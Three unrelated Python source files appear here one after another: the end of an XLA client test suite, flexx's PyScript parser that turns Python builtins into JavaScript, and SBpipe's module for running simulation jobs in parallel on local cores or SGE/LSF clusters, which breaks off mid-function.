computation_to_apply=self._CreateBinaryAddF32Computation(),
window_dimensions=(2, 1), window_strides=(1, 1),
padding=xla_client.PaddingType.SAME)
self._ExecuteAndCompareClose(c, expected=[[5., 7., 9.], [4., 5., 6.]])
def testReduceWindowValidGeneralStridesF32(self):
input_array = NumpyArrayF32([[1.0, 2.0, 3.0], [4.0, 5.0, 6.0]])
c = self._NewComputation()
c.ReduceWindow(operand=c.Constant(input_array),
init_value=c.ConstantF32Scalar(0),
computation_to_apply=self._CreateBinaryAddF32Computation(),
window_dimensions=(2, 1), window_strides=(1, 2),
padding=xla_client.PaddingType.VALID)
self._ExecuteAndCompareClose(c, expected=[[5., 9.]])
def testReduceWindowValidUnitStridesF64(self):
input_array = NumpyArrayF64([[1.0, 2.0, 3.0], [4.0, 5.0, 6.0]])
c = self._NewComputation()
c.ReduceWindow(operand=c.Constant(input_array),
init_value=c.ConstantF64Scalar(0),
computation_to_apply=self._CreateBinaryAddF64Computation(),
window_dimensions=(2, 1), window_strides=(1, 1),
padding=xla_client.PaddingType.VALID)
self._ExecuteAndCompareClose(c, expected=[[5., 7., 9.]])
def testReduceWindowSameUnitStridesF64(self):
input_array = NumpyArrayF64([[1.0, 2.0, 3.0], [4.0, 5.0, 6.0]])
c = self._NewComputation()
c.ReduceWindow(operand=c.Constant(input_array),
init_value=c.ConstantF64Scalar(0),
computation_to_apply=self._CreateBinaryAddF64Computation(),
window_dimensions=(2, 1), window_strides=(1, 1),
padding=xla_client.PaddingType.SAME)
self._ExecuteAndCompareClose(c, expected=[[5., 7., 9.], [4., 5., 6.]])
def testReduceWindowValidGeneralStridesF64(self):
input_array = NumpyArrayF64([[1.0, 2.0, 3.0], [4.0, 5.0, 6.0]])
c = self._NewComputation()
c.ReduceWindow(operand=c.Constant(input_array),
init_value=c.ConstantF64Scalar(0),
computation_to_apply=self._CreateBinaryAddF64Computation(),
window_dimensions=(2, 1), window_strides=(1, 2),
padding=xla_client.PaddingType.VALID)
self._ExecuteAndCompareClose(c, expected=[[5., 9.]])
def testWhileF32(self):
cond = self._CreateTestF32Lt10Computation()
body = self._CreateMulF32By2Computation()
c = self._NewComputation()
init = c.ConstantF32Scalar(1.)
c.While(cond, body, init)
self._ExecuteAndCompareClose(c, expected=16.)
def testWhileF64(self):
cond = self._CreateTestF64Lt10Computation()
body = self._CreateMulF64By2Computation()
c = self._NewComputation()
init = c.ConstantF64Scalar(1.)
c.While(cond, body, init)
self._ExecuteAndCompareClose(c, expected=16.)
def testConditionalTrue(self):
c = self._NewComputation()
pred = c.ConstantPredScalar(True)
true_operand = c.ConstantF32Scalar(3.)
true_computation = self._CreateMulF32By2Computation()
false_operand = c.ConstantF32Scalar(2.)
false_computation = self._CreateConstantF32Computation()
c.Conditional(pred, true_operand, true_computation, false_operand,
false_computation)
self._ExecuteAndCompareClose(c, expected=6.)
def testConditionalFalse(self):
c = self._NewComputation()
pred = c.ConstantPredScalar(False)
true_operand = c.ConstantF32Scalar(3.)
true_computation = self._CreateMulF32By2Computation()
false_operand = c.ConstantF32Scalar(2.)
false_computation = self._CreateConstantF32Computation()
c.Conditional(pred, true_operand, true_computation, false_operand,
false_computation)
self._ExecuteAndCompareClose(c, expected=1.)
def testInfeedS32Values(self):
to_infeed = NumpyArrayS32([1, 2, 3, 4])
c = self._NewComputation()
c.Infeed(xla_client.Shape.from_pyval(to_infeed[0]))
compiled_c = c.Build().CompileWithExampleArguments()
for item in to_infeed:
xla_client.transfer_to_infeed(item)
for item in to_infeed:
result = compiled_c.ExecuteWithPythonValues()
self.assertEqual(result, item)
def testInfeedThenOutfeedS32(self):
to_round_trip = NumpyArrayS32([1, 2, 3, 4])
c = self._NewComputation()
x = c.Infeed(xla_client.Shape.from_pyval(to_round_trip[0]))
c.Outfeed(x)
compiled_c = c.Build().CompileWithExampleArguments()
for want in to_round_trip:
execution = threading.Thread(target=compiled_c.Execute)
execution.start()
xla_client.transfer_to_infeed(want)
got = xla_client.transfer_from_outfeed(
xla_client.Shape.from_pyval(to_round_trip[0]))
execution.join()
self.assertEqual(want, got)
class ErrorTest(LocalComputationTest):
def setUp(self):
self.f32_scalar_2 = NumpyArrayF32(2.0)
self.s32_scalar_2 = NumpyArrayS32(2)
def testInvokeWithWrongElementType(self):
c = self._NewComputation()
c.SetOpMetadata(xla_client.CurrentSourceInfoMetadata())
c.ParameterFromNumpy(self.s32_scalar_2)
c.ClearOpMetadata()
self.assertRaisesRegexp(
RuntimeError, r"Invalid argument shape.*xla_client_test.py.*"
r"expected s32\[\], got f32\[\]",
lambda: c.Build().CompileWithExampleArguments([self.f32_scalar_2]))
class ComputationRootTest(LocalComputationTest):
"""Tests related to setting the root of the computation."""
def testComputationRootDifferentFromLastOp(self):
c = self._NewComputation()
x = c.ParameterFromNumpy(NumpyArrayF32(2.0))
result = c.Add(x, c.ConstantF32Scalar(3.14))
extra = c.Add(result, c.ConstantF32Scalar(1.618)) # pylint: disable=unused-variable
arg = NumpyArrayF32(1.0)
compiled_c = c.Build(result).CompileWithExampleArguments([arg])
ans = compiled_c.ExecuteWithPythonValues([arg])
np.testing.assert_allclose(ans, 4.14)
if __name__ == "__main__":
unittest.main()
|
|
"""
Python Builtins
---------------
Most builtin functions (that make sense in JS) are automatically
translated to JavaScript: isinstance, issubclass, callable, hasattr,
getattr, setattr, delattr, print, len, max, min, chr, ord, dict, list,
tuple, range, pow, sum, round, int, float, str, bool, abs, divmod, all,
any, enumerate, zip, reversed, sorted, filter, map.
Further, all methods for list, dict and str are implemented (except the str
methods: encode, decode, format, format_map, isdecimal, isdigit,
isprintable, maketrans).
.. pyscript_example::
# "self" is replaced with "this"
self.foo
# Printing just works
print('some test')
print(a, b, c, sep='-')
# Getting the length of a string or array
len(foo)
# Rounding and abs
round(foo) # round to nearest integer
int(foo) # round towards 0 as in Python
abs(foo)
# min and max
min(foo)
min(a, b, c)
max(foo)
max(a, b, c)
# divmod
a, b = divmod(100, 7) # -> 14, 2
# Aggregation
sum(foo)
all(foo)
any(foo)
# Turning things into numbers, bools and strings
str(s)
float(x)
bool(y)
int(z) # this rounds towards zero like in Python
chr(65) # -> 'A'
ord('A') # -> 65
# Turning things into lists and dicts
dict([['foo', 1], ['bar', 2]]) # -> {'foo': 1, 'bar': 2}
list('abc') # -> ['a', 'b', 'c']
dict(other_dict) # make a copy
list(other_list) # make copy
The isinstance function (and friends)
-------------------------------------
The ``isinstance()`` function works for all JS primitive types, but also
for user-defined classes.
.. pyscript_example::
# Basic types
isinstance(3, float) # in JS there are no ints
isinstance('', str)
isinstance([], list)
isinstance({}, dict)
isinstance(foo, types.FunctionType)
# Can also use JS strings
isinstance(3, 'number')
isinstance('', 'string')
isinstance([], 'array')
isinstance({}, 'object')
isinstance(foo, 'function')
# You can use it on your own types too ...
isinstance(x, MyClass)
isinstance(x, 'MyClass') # equivalent
isinstance(x, 'Object') # also yields true (subclass of Object)
# issubclass works too
issubclass(Foo, Bar)
# As well as callable
callable(foo)
hasattr, getattr, setattr and delattr
-------------------------------------
.. pyscript_example::
a = {'foo': 1, 'bar': 2}
hasattr(a, 'foo') # -> True
hasattr(a, 'fooo') # -> False
hasattr(null, 'foo') # -> False
getattr(a, 'foo') # -> 1
getattr(a, 'fooo') # -> raise AttributeError
getattr(a, 'fooo', 3) # -> 3
getattr(null, 'foo', 3) # -> 3
setattr(a, 'foo', 2)
delattr(a, 'foo')
Creating sequences
------------------
.. pyscript_example::
range(10)
range(2, 10, 2)
range(100, 0, -1)
reversed(foo)
sorted(foo)
enumerate(foo)
zip(foo, bar)
filter(func, foo)
map(func, foo)
List methods
------------
.. pyscript_example::
# Call a.append() if it exists, otherwise a.push()
a.append(x)
# Similar for remove()
a.remove(x)
Dict methods
------------
.. pyscript_example::
a = {'foo': 3}
a['foo']
a.get('foo', 0)
a.get('foo')
a.keys()
Str methods
-----------
.. pyscript_example::
"foobar".startswith('foo')
"foobar".replace('foo', 'bar')
"foobar".upper()
Using JS specific functionality
-------------------------------
When writing PyScript inside Python modules, we recommend prefixing
references to JS-specific functionality with ``window``, where ``window``
represents the global JS namespace. All global JavaScript objects,
functions, and variables automatically become members of the ``window``
object. This makes it clear that the functionality is specific to JS, and
also helps static code analysis tools like flake8.
.. pyscript_example::
from flexx.pyscript import window # this is a stub
def foo(a):
return window.Math.cos(a)
Aside from ``window``, ``flexx.pyscript`` also provides ``undefined``,
``Infinity``, and ``NaN``.
"""
from . import commonast as ast
from . import stdlib
from .parser2 import Parser2, JSError, unify # noqa
from .stubs import RawJS
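# A minimal usage sketch (hypothetical; assumes flexx's public ``py2js``
# helper, which drives this parser):
#
#     from flexx.pyscript import py2js
#     js = py2js("print(len([1, 2, 3]))")
#     # -> roughly: console.log([1, 2, 3].length);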
# This class has several `function_foo()` and `method_bar()` methods
# to implement corresponding functionality. Most of these are
# auto-generated from the stdlib. However, some methods need explicit
# implementation, e.g. to parse keyword arguments, or are inlined rather
# than implemented via the stdlib.
#
# Note that when the number of arguments does not match, almost all
# functions raise a compile-time error. The methods, however, will
# bypass the stdlib in this case, because it is assumed that the user
# intended to call a special method on the object.
class Parser3(Parser2):
""" Parser to transcompile Python to JS, allowing more Pythonic
code, like ``self``, ``print()``, ``len()``, list methods, etc.
"""
def function_this_is_js(self, node):
# Note that we handle this_is_js() shortcuts in the if-statement
# directly. This replacement with a string is when this_is_js()
# is used outside an if statement.
if len(node.arg_nodes) != 0:
raise JSError('this_is_js() expects zero arguments.')
return ('"this_is_js()"')
def function_RawJS(self, node):
if len(node.arg_nodes) == 1:
if not isinstance(node.arg_nodes[0], ast.Str):
raise JSError('RawJS needs a verbatim string (use multiple '
'args to bypass PyScript\'s RawJS).')
lines = RawJS._str2lines(node.arg_nodes[0].value)
indent = (self._indent * 4) * ' '
return '\n'.join([indent + line for line in lines])
else:
            return None  # fall through; RawJS may be a user-defined name here
    ## Python builtin functions
def function_isinstance(self, node):
if len(node.arg_nodes) != 2:
raise JSError('isinstance() expects two arguments.')
ob = unify(self.parse(node.arg_nodes[0]))
cls = unify(self.parse(node.arg_nodes[1]))
if cls[0] in '"\'':
cls = cls[1:-1] # remove quotes
BASIC_TYPES = ('number', 'boolean', 'string', 'function', 'array',
'object', 'null', 'undefined')
MAP = {'[int, float]': 'number', '[float, int]': 'number', 'float': 'number',
'str': 'string', 'basestring': 'string', 'string_types': 'string',
'bool': 'boolean',
'FunctionType': 'function', 'types.FunctionType': 'function',
'list': 'array', 'tuple': 'array',
'[list, tuple]': 'array', '[tuple, list]': 'array',
'dict': 'object',
}
cmp = MAP.get(cls, cls)
if cmp.lower() in BASIC_TYPES:
# Basic type, use Object.prototype.toString
# http://stackoverflow.com/questions/11108877
return ["({}).toString.call(",
ob,
").match(/\s([a-zA-Z]+)/)[1].toLowerCase() === ",
"'%s'" % cmp.lower()
]
else:
# User defined type, use instanceof
# http://tobyho.com/2011/01/28/checking-types-in-javascript/
cmp = unify(cls)
if cmp[0] == '(':
raise JSError('isinstance() can only compare to simple types')
return ob, " instanceof ", cmp
def function_issubclass(self, node):
# issubclass only needs to work on custom classes
if len(node.arg_nodes) != 2:
raise JSError('issubclass() expects two arguments.')
cls1 = unify(self.parse(node.arg_nodes[0]))
cls2 = unify(self.parse(node.arg_nodes[1]))
if cls2 == 'object':
cls2 = 'Object'
return '(%s.prototype instanceof %s)' % (cls1, cls2)
def function_print(self, node):
# Process keywords
sep, end = '" "', ''
for kw in node.kwarg_nodes:
if kw.name == 'sep':
sep = ''.join(self.parse(kw.value_node))
elif kw.name == 'end':
end = ''.join(self.parse(kw.value_node))
elif kw.name in ('file', 'flush'):
raise JSError('print() file and flush args not supported')
else:
raise JSError('Invalid argument for print(): %r' % kw.name)
# Combine args
args = [unify(self.parse(arg)) for arg in node.arg_nodes]
end = (" + %s" % end) if (args and end and end != '\n') else ''
combiner = ' + %s + ' % sep
args_concat = combiner.join(args) or '""'
return 'console.log(' + args_concat + end + ')'
def function_len(self, node):
if len(node.arg_nodes) == 1:
return unify(self.parse(node.arg_nodes[0])), '.length'
else:
return None # don't apply this feature
def function_max(self, node):
if len(node.arg_nodes) == 0:
raise JSError('max() needs at least one argument')
elif len(node.arg_nodes) == 1:
arg = ''.join(self.parse(node.arg_nodes[0]))
return 'Math.max.apply(null, ', arg, ')'
else:
args = ', '.join([unify(self.parse(arg)) for arg in node.arg_nodes])
return 'Math.max(', args, ')'
def function_min(self, node):
if len(node.arg_nodes) == 0:
raise JSError('min() needs at least one argument')
elif len(node.arg_nodes) == 1:
arg = ''.join(self.parse(node.arg_nodes[0]))
return 'Math.min.apply(null, ', arg, ')'
else:
args = ', '.join([unify(self.parse(arg)) for arg in node.arg_nodes])
return 'Math.min(', args, ')'
def function_callable(self, node):
if len(node.arg_nodes) == 1:
arg = unify(self.parse(node.arg_nodes[0]))
return '(typeof %s === "function")' % arg
else:
            raise JSError('callable() needs exactly one argument')
def function_chr(self, node):
if len(node.arg_nodes) == 1:
arg = ''.join(self.parse(node.arg_nodes[0]))
return 'String.fromCharCode(%s)' % arg
else:
            raise JSError('chr() needs exactly one argument')
def function_ord(self, node):
if len(node.arg_nodes) == 1:
arg = ''.join(self.parse(node.arg_nodes[0]))
return '%s.charCodeAt(0)' % arg
else:
            raise JSError('ord() needs exactly one argument')
def function_dict(self, node):
if len(node.arg_nodes) == 0:
kwargs = ['%s:%s' % (arg.name, unify(self.parse(arg.value_node)))
for arg in node.kwarg_nodes]
return '{%s}' % ', '.join(kwargs)
if len(node.arg_nodes) == 1:
return self.use_std_function('dict', node.arg_nodes)
else:
            raise JSError('dict() needs at most one argument')
def function_list(self, node):
if len(node.arg_nodes) == 0:
return '[]'
if len(node.arg_nodes) == 1:
return self.use_std_function('list', node.arg_nodes)
else:
            raise JSError('list() needs at most one argument')
def function_tuple(self, node):
return self.function_list(node)
def function_range(self, node):
if len(node.arg_nodes) == 1:
args = ast.Num(0), node.arg_nodes[0], ast.Num(1)
return self.use_std_function('range', args)
elif len(node.arg_nodes) == 2:
args = node.arg_nodes[0], node.arg_nodes[1], ast.Num(1)
return self.use_std_function('range', args)
elif len(node.arg_nodes) == 3:
return self.use_std_function('range', node.arg_nodes)
else:
raise JSError('range() needs 1, 2 or 3 arguments')
def function_sorted(self, node):
if len(node.arg_nodes) == 1:
key, reverse = ast.Name('undefined'), ast.NameConstant(False)
for kw in node.kwarg_nodes:
if kw.name == 'key':
key = kw.value_node
elif kw.name == 'reverse':
reverse = kw.value_node
else:
raise JSError('Invalid keyword argument for sorted: %r' % kw.name)
return self.use_std_function('sorted', [node.arg_nodes[0], key, reverse])
else:
raise JSError('sorted() needs one argument')
## Methods of list/dict/str
def method_sort(self, node, base):
        if len(node.arg_nodes) == 0:  # sort's args are keyword-only
key, reverse = ast.Name('undefined'), ast.NameConstant(False)
for kw in node.kwarg_nodes:
if kw.name == 'key':
key = kw.value_node
elif kw.name == 'reverse':
reverse = kw.value_node
else:
raise JSError('Invalid keyword argument for sort: %r' % kw.name)
return self.use_std_method(base, 'sort', [key, reverse])
# Add functions and methods to the class, using the stdlib functions ...
def make_function(name, nargs, function_deps, method_deps):
def function_X(self, node):
if node.kwarg_nodes:
raise JSError('Function %s does not support keyword args.' % name)
if len(node.arg_nodes) not in nargs:
raise JSError('Function %s needs #args in %r.' % (name, nargs))
for dep in function_deps:
self.use_std_function(dep, [])
for dep in method_deps:
self.use_std_method('x', dep, [])
return self.use_std_function(name, node.arg_nodes)
return function_X
def make_method(name, nargs, function_deps, method_deps):
def method_X(self, node, base):
if node.kwarg_nodes:
raise JSError('Method %s does not support keyword args.' % name)
if len(node.arg_nodes) not in nargs:
return None # call as-is, don't use our variant
for dep in function_deps:
self.use_std_function(dep, [])
for dep in method_deps:
self.use_std_method('x', dep, [])
return self.use_std_method(base, name, node.arg_nodes)
return method_X
for name, code in stdlib.METHODS.items():
nargs, function_deps, method_deps = stdlib.get_std_info(code)
if nargs and not hasattr(Parser3, 'method_' + name):
m = make_method(name, tuple(nargs), function_deps, method_deps)
setattr(Parser3, 'method_' + name, m)
for name, code in stdlib.FUNCTIONS.items():
nargs, function_deps, method_deps = stdlib.get_std_info(code)
if nargs and not hasattr(Parser3, 'function_' + name):
m = make_function(name, tuple(nargs), function_deps, method_deps)
setattr(Parser3, 'function_' + name, m)
|
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Copyright (c) 2018 Piero Dalle Pezze
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
#
#
# Object: Execute the model several times for deterministic or stochastic analysis
from __future__ import print_function
import logging
import sys
import os
import multiprocessing
import subprocess
import shlex
from time import sleep
logger = logging.getLogger('sbpipe')
def run_cmd(cmd):
"""
Run a command using Python subprocess.
    :param cmd: the string of the command to run
    :return: the standard output and standard error of the command
    """
if sys.version_info > (3,):
with subprocess.Popen(shlex.split(cmd), stdout=subprocess.PIPE, stderr=subprocess.PIPE) as p:
out, err = p.communicate()
else:
p = subprocess.Popen(shlex.split(cmd), stdout=subprocess.PIPE, stderr=subprocess.PIPE)
out, err = p.communicate()
return out, err
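# Example usage (hypothetical command; note that `out` and `err` are bytes
# and may need decoding on Python 3):
#
#     out, err = run_cmd('ls -la')
#     print(out.decode('utf-8'))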
def run_cmd_block(cmd):
"""
Run a command using Python subprocess. Block the call until the command has finished.
    :param cmd: the string of the command to run
    """
    subprocess.call(shlex.split(cmd))
def parcomp(cmd, cmd_iter_substr, output_dir, cluster='local', runs=1, local_cpus=1, output_msg=False,
colnames=[]):
"""
Generic function to run a command in parallel
:param cmd: the command string to run in parallel
:param cmd_iter_substr: the substring of the iteration number. This will be replaced in a number automatically
:param output_dir: the output directory
:param cluster: the cluster type among local (Python multiprocessing), sge, or lsf
:param runs: the number of runs. Ignored if colnames is not empty
    :param local_cpus: the maximum number of CPUs to use
:param output_msg: print the output messages on screen (available for cluster='local' only)
:param colnames: the name of the columns to process
:return: True if the computation succeeded.
"""
logger.debug("Parallel computation using " + cluster)
logger.debug("Command: " + cmd)
logger.debug("Iter ID string: " + cmd_iter_substr)
logger.debug("# runs: " + str(runs))
if cluster == "sge" or cluster == "lsf":
out_dir = os.path.join(output_dir, 'out')
err_dir = os.path.join(output_dir, 'err')
if not os.path.exists(out_dir):
os.makedirs(out_dir)
if not os.path.exists(err_dir):
os.makedirs(err_dir)
if cluster == "sge": # use SGE (Sun Grid Engine)
return run_jobs_sge(cmd, cmd_iter_substr, out_dir, err_dir, runs, colnames)
elif cluster == "lsf": # use LSF (Platform Load Sharing Facility)
return run_jobs_lsf(cmd, cmd_iter_substr, out_dir, err_dir, runs, colnames)
    else:  # use local by default (Python multiprocessing), running multiple processes on the local cores
if cluster != "local":
logger.warning(
"Variable cluster is not set correctly in the configuration file. "
"Values are: `local`, `lsf`, `sge`. Running `local` by default")
return run_jobs_local(cmd, cmd_iter_substr, runs, local_cpus, output_msg, colnames)
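# Example usage (hypothetical command; 'X' is an arbitrary placeholder string
# that parcomp replaces with the run number 1..runs):
#
#     parcomp('python simulate.py --run X', 'X', 'results',
#             cluster='local', runs=10, local_cpus=4)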
def progress_bar(it, total):
"""
A minimal CLI progress bar.
:param it: current iteration starting from 1
:param total: total iterations
"""
percent = '(' + ("{0:.1f}").format(100 * (it / float(total))) + '%)'
progress = str(it) + ' of ' + str(total)
print('\r%s %s %s' % ('Initialised:', progress, percent), end='\r')
if it == total:
print()
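# Example: render an updating one-line counter such as
# "Initialised: 3 of 10 (30.0%)":
#
#     for i in range(1, 11):
#         progress_bar(i, 10)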
def progress_bar2(it, total):
"""
A CLI progress bar.
:param it: current iteration starting from 1
:param total: total iterations
"""
percent = ("{0:.1f}").format(100 * (it / float(total)))
length = 50
filled = int(length * it // total)
bar = '#' * filled + '-' * (length - filled)
progress = '(' + str(it) + ' of ' + str(total) + ')'
print('\r%s |%s| %s%% %s' % ('Progress:', bar, percent, progress), end='\r')
if it == total:
print()
def call_proc(params):
"""
Run a command using Python subprocess.
    :param params: a tuple (command string, command id, total number of runs, logging handler level)
"""
cmd, id, runs, handler_level = params
if handler_level <= logging.INFO:
progress_bar(id, runs)
if sys.version_info > (3,):
with subprocess.Popen(shlex.split(cmd), stdout=subprocess.PIPE, stderr=subprocess.PIPE) as p:
out, err = p.communicate()
else:
p = subprocess.Popen(shlex.split(cmd), stdout=subprocess.PIPE, stderr=subprocess.PIPE)
out, err = p.communicate()
return out, err
def run_jobs_local(cmd, cmd_iter_substr, runs=1, local_cpus=1, output_msg=False, colnames=[]):
"""
Run jobs using python multiprocessing locally.
:param cmd: the full command to run as a job
:param cmd_iter_substr: the substring in command to be replaced with a number
:param runs: the number of runs. Ignored if colnames is not empty
:param local_cpus: The number of available cpus. If local_cpus <=0, only one core will be used.
:param output_msg: print the output messages on screen (available for cluster_type='local' only)
:param colnames: the name of the columns to process
:return: True
"""
# Create a Pool.
pool = multiprocessing.Pool(1)
if local_cpus > 0:
if local_cpus <= multiprocessing.cpu_count():
# Create a pool with local_cpus
pool = multiprocessing.Pool(local_cpus)
logger.debug('Initialised multiprocessing.Pool with ' + str(local_cpus))
else:
logger.warning('`local_cpus` is higher than the physical number of CPUs (' +
str(multiprocessing.cpu_count()) + '). Setting `local_cpus` to ' +
str(multiprocessing.cpu_count()))
pool = multiprocessing.Pool(multiprocessing.cpu_count())
logger.info("Starting computation...")
results = []
# get the current level for the StreamHandler
# this must be executed at run-time
if len(logger.handlers) > 1:
handler_level = logger.handlers[1].level
else:
handler_level = logging.INFO
if len(colnames) > 0:
runs = len(colnames)
for i, column in enumerate(colnames):
command = cmd.replace(cmd_iter_substr, column)
logger.debug(command)
params = (command, i+1, runs, handler_level)
results.append(pool.apply_async(call_proc, (params,)))
else:
for i in range(0, runs):
command = cmd.replace(cmd_iter_substr, str(i+1))
logger.debug(command)
params = (command, i+1, runs, handler_level)
results.append(pool.apply_async(call_proc, (params,)))
# Close the pool and wait for each running task to complete
pool.close()
pool.join()
failed = 0
for result in results:
out, err = result.get()
# convert byte to str. Necessary for Python 3+.
# this is also compatible with Python 2.7
out = out.decode('utf-8')
err = err.decode('utf-8')
if 'error' in err.lower():
logger.error('\n' + err)
failed += 1
elif 'warning' in err.lower():
logger.warning('\n' + err)
else:
logger.debug('\n' + err)
if 'error' in out.lower():
logger.error('\n' + out)
elif 'warning' in out.lower():
logger.warning('\n' + out)
else:
if output_msg:
logger.info('\n' + out)
else:
logger.debug('\n' + out)
# Print the status of the parallel computation.
logger.info("Computation terminated.")
if failed == runs:
logger.warning('All computations seem to have errors in the standard error.')
logger.warning("For additional information, run SBpipe using the `--verbose` option.")
# return False
elif failed > 0:
logger.warning("Some computation might have failed. Do all output files exist?")
logger.warning("For additional information, run SBpipe using the `--verbose` option.")
else:
logger.info("If errors occur, check that " + cmd.split(" ")[0] + " runs correctly.")
logger.info("For additional information, run SBpipe using the `--verbose` option.")
return True
def run_jobs_sge(cmd, cmd_iter_substr, out_dir, err_dir, runs=1, colnames=[]):
"""
Run jobs using a Sun Grid Engine (SGE) cluster.
:param cmd: the full command to run as a job
:param cmd_iter_substr: the substring in command to be replaced with a number
:param out_dir: the directory containing the standard output from qsub
:param err_dir: the directory containing the standard error from qsub
:param runs: the number of runs. Ignored if colnames is not empty
:param colnames: the name of the columns to process
:return: True if the computation succeeded.
"""
# Test this with echo "ls -la" | xargs xargs using Python environment.
# The following works:
# lsCMD = "ls -la"
# echo_cmd=["echo", lsCMD]
# xargsCMD=["xargs", "xargs"]
# echo_proc = subprocess.Popen(echo_cmd, stdout=subprocess.PIPE)
# xargsProc = subprocess.Popen(xargsCMD, stdin=echo_proc.stdout)
logger.info("Starting computation...")
jobs = ""
cmd_iter_substr = cmd_iter_substr.strip('/')
# get the current level for the StreamHandler
# this must be executed at run-time
if len(logger.handlers) > 1:
handler_level = logger.handlers[1].level
else:
handler_level = logging.INFO
if len(colnames) > 0:
runs = len(colnames)
for i, column in enumerate(colnames):
# Now the same with qsub
jobs = "j" + column + "_" + cmd_iter_substr + "," + jobs
qsub_cmd = ["qsub", "-cwd", "-V", "-N", "j" + column + "_" + cmd_iter_substr, "-o", os.path.join(out_dir, "j" + column), "-e", os.path.join(err_dir, "j" + column), "-b", "y", cmd.replace(cmd_iter_substr, column)]
logger.debug(qsub_cmd)
#logger.info('Starting Task ' + column)
if sys.version_info > (3,):
with subprocess.Popen(qsub_cmd, stdout=subprocess.PIPE) as p:
p.communicate()[0]
else:
qsub_proc = subprocess.Popen(qsub_cmd, stdout=subprocess.PIPE)
qsub_proc.communicate()[0]
if handler_level <= logging.INFO:
sleep(0.01)
progress_bar(i+1, runs)
else:
for i in range(0, runs):
# Now the same with qsub
jobs = "j" + str(i+1) + "_" + cmd_iter_substr + "," + jobs
qsub_cmd = ["qsub", "-cwd", "-V", "-N", "j" + str(i+1) + "_" + cmd_iter_substr, "-o", os.path.join(out_dir, "j" + str(i+1)), "-e", os.path.join(err_dir, "j" + str(i+1)), "-b", "y", cmd.replace(cmd_iter_substr, str(i+1))]
logger.debug(qsub_cmd)
#logger.info('Starting Task ' + str(i+1))
if sys.version_info > (3,):
with subprocess.Popen(qsub_cmd, stdout=subprocess.PIPE) as p:
p.communicate()[0]
else:
qsub_proc = subprocess.Popen(qsub_cmd, stdout=subprocess.PIPE)
qsub_proc.communicate()[0]
if handler_level <= logging.INFO:
sleep(0.01)
progress_bar(i+1, runs)
# Check here when these jobs are finished before proceeding
    # Don't add names for the output and error files as they can generate errors.
qsub_cmd = ["qsub", "-sync", "y", "-b", "y", "-o", "/dev/null", "-e", "/dev/null", "-hold_jid", jobs[:-1], "sbpipe_" + cmd_iter_substr, "1"]
if sys.version_info > (3,):
with subprocess.Popen(qsub_cmd, stdout=subprocess.PIPE) as p:
p.communicate()[0]
else:
qsub_proc = subprocess.Popen(qsub_cmd, stdout=subprocess.PIPE)
qsub_proc.communicate()[0]
logger.debug(qsub_cmd)
logger.info("Computation terminated.")
return quick_debug(cmd, out_dir, err_dir)
def run_jobs_lsf(cmd, cmd_iter_substr, out_dir, err_dir, runs=1, colnames=[]):
"""
Run jobs using a Load Sharing Facility (LSF) cluster.
:param cmd: the full command to run as a job
:param cmd_iter_substr: the substring in command to be replaced with a number
:param out_dir: the directory containing the standard output from bsub
:param err_dir: the directory containing the standard error from bsub
:param runs: the number of runs. Ignored if colnames is not empty
:param colnames: the name of the columns to process
:return: True if the computation succeeded.
"""
logger.info("Starting computation...")
jobs = ""
cmd_iter_substr = cmd_iter_substr.strip('/')
# get the current level for the StreamHandler
# this must be executed at run-time
if len(logger.handlers) > 1:
handler_level = logger.handlers[1].level
else:
handler_level = logging.INFO
if len(colnames) > 0:
runs = len(colnames)
for i, column in enumerate(colnames):
jobs = "done(j" + column + "_" + cmd_iter_substr + ")&&" + jobs
bsub_cmd = ["bsub", "-cwd", "-J", "j" + column + "_" + cmd_iter_substr, "-o", os.path.join(out_dir, "j" + column), "-e",
os.path.join(err_dir, "j" + column), cmd.replace(cmd_iter_substr, column)]
logger.debug(bsub_cmd)
#logger.info('Starting Task ' + column)
if sys.version_info > (3,):
with subprocess.Popen(bsub_cmd, stdout=subprocess.PIPE) as p:
p.communicate()[0]
else:
bsub_proc = subprocess.Popen(bsub_cmd, stdout=subprocess.PIPE)
bsub_proc.communicate()[0]
if handler_level <= logging.INFO:
sleep(0.01)
progress_bar(i+1, runs)
else:
for i in range(0, runs):
jobs = "done(j" + str(i+1) + "_" + cmd_iter_substr + ")&&" + jobs
bsub_cmd = ["bsub", "-cwd", "-J", "j" + str(i+1) + "_" + cmd_iter_substr, "-o", os.path.join(out_dir, "j" + str(i+1)), "-e", os.path.join(err_dir, "j" + str(i+1)), cmd.replace(cmd_iter_substr, str(i+1))]
logger.debug(bsub_cmd)
#logger.info('Starting Task ' + str(i+1))
if sys.version_info > (3,):
with subprocess.Popen(bsub_cmd, stdout=subprocess.PIPE) as p:
p.communicate()[0]
else:
bsub_proc = subprocess.Popen(bsub_cmd, stdout=subprocess.PIPE)
bsub_proc.communicate()[0]
if handler_level <= logging.INFO:
sleep(0.01)
progress_bar(i + 1, runs)
# Check here when these jobs are finished before proceeding
import random
import string
job_name = ''.join(random.SystemRandom().choice(string.ascii_uppercase + string.digits) for _ in range(7))
bsub_cmd = ["bsub", "-J", job_name, "-o", "/dev/null", "-e", "/dev/null", "-w", jobs[:-2], "sbpipe_" + cmd_iter_substr, "1"]
logger.debug(bsub_cmd)
if sys.version_info > (3,):
with subprocess.Popen(bsub_cmd, stdout=subprocess.PIPE) as p:
p.communicate()[0]
else:
bsub_proc = subprocess.Popen(bsub_cmd, stdout=subprocess.PIPE)
bsub_proc.communicate()[0]
# Something better than the following would be highly desirable
import time
found = True
while found:
time.sleep(2)
        if sys.version_info > (3,):
            with subprocess.Popen(["bjobs", "-psr"], stdout=subprocess.PIPE) as p:
